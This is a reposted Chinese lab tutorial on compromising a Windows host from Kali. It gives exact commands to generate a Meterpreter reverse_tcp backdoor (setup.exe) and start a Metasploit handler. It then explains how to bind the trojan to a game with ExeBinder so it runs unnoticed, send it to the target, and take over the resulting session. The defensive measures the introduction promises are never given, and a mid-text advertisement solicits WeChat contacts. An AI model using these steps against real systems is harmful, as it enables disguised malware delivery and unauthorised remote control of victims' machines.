首頁 資訊 > 業(yè)界 > 正文

天天短訊!Kali滲透Windows服務器

這個實驗主要讓我們學習漏洞掃描技術(shù)基本原理,了解其在網(wǎng)絡攻防中的作用,掌握使用Kali中的Metasploit對目標主機滲透,并根據(jù)報告做出相應的防護措施。

本次實戰(zhàn)環(huán)境:Kali滲透Windows服務器

實戰(zhàn)步驟一


(資料圖)

本實驗通過利用kali進行漏洞掃描,使用Metasploit對目標主機進行滲透測試,并根據(jù)報告做出相應的防護措施,共分為3個實驗步驟,詳情如下;

1、 實戰(zhàn)步驟一:生成setup.exe后門程序,即木馬程序。

(1) 打開kali終端,輸入ifconfig, 得到本機ip為192.168.189.130。

如下圖:

(2)輸入以下命令,使用msfpayload生成名為setup的后門程序:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:

(3) 進入setup.exe所在目錄,修改屬性:選擇“允許以程序執(zhí)行文件”。

如下圖所示:

(4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來設置本地主機;然后輸入exploit -z -j開始監(jiān)聽,如下圖所示:

實戰(zhàn)步驟二

將上面生成的木馬程序與某個軟件進行捆綁。

【----幫助網(wǎng)安學習,以下所有學習資料免費領(lǐng)!加vx:yj009991,備注 “博客園” 獲取!】

① 網(wǎng)安學習成長路徑思維導圖?、?60+網(wǎng)安經(jīng)典常用工具包 ③ 100+SRC漏洞分析報告?、?150+網(wǎng)安攻防實戰(zhàn)技術(shù)電子書?、?最權(quán)威CISSP 認證考試指南+題庫 ⑥ 超1800頁CTF實戰(zhàn)技巧手冊?、?最新網(wǎng)安大廠面試題合集(含答案)?、?APP客戶端安全檢測指南(安卓+IOS)

(1)可以在windows系統(tǒng)下使用exe捆綁軟件將setup.exe和一個其他的某個安全軟件合并為一個軟件,這樣在運行軟件時兩個軟件同時運行,不會引起注意。在tools里面進入名為exekunbang的文件,先打開ExeBinder.exe捆綁軟件。選擇第一個要合并的軟件,默認選擇本軟件中自帶的小游戲程序:

點擊下一步,選擇第二個要捆綁的軟件,即之前生成的木馬程序setup.exe:

點擊下一步,選擇一個文件要保存的路徑:

繼續(xù)點擊下一步,開始捆綁軟件:

(2) 將捆綁后的軟件發(fā)送給目標主機。

實戰(zhàn)步驟三

檢測目標主機,對目標主機進行滲透測試。

(2) 目標主機執(zhí)行程序后,在kali終端中的檢測程序會及時檢測到。在檢測到目標主機運行程序后,后門程序會反向連接到msf,之后msf發(fā)起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務端(msf)。輸入sessionss:

可以看到目標主機的ip為192.168.189.129,

(2)再繼續(xù)輸入sessions -i 1,之后可以對目標主機進行一系列的操作。如輸入sysinfo可知道目標主機的系統(tǒng)信息;輸入 getuid查看對方正在運行的用戶。

要養(yǎng)成多思考多總結(jié)的習慣,對實驗結(jié)果多去分析,這樣回收獲更多。比如如何利用kali進行漏洞掃描;如何使用Metasploit對目標主機進行滲透測試;這些都是這次實戰(zhàn)后可以去思考的。

更多網(wǎng)安技能的在線實操練習,請點擊這里>>

關(guān)鍵詞:

最近更新

關(guān)于本站 管理團隊 版權(quán)申明 網(wǎng)站地圖 聯(lián)系合作 招聘信息

Copyright © 2005-2023 創(chuàng)投網(wǎng) - www.mallikadua.com All rights reserved
聯(lián)系我們:39 60 29 14 2@qq.com
皖I(lǐng)CP備2022009963號-3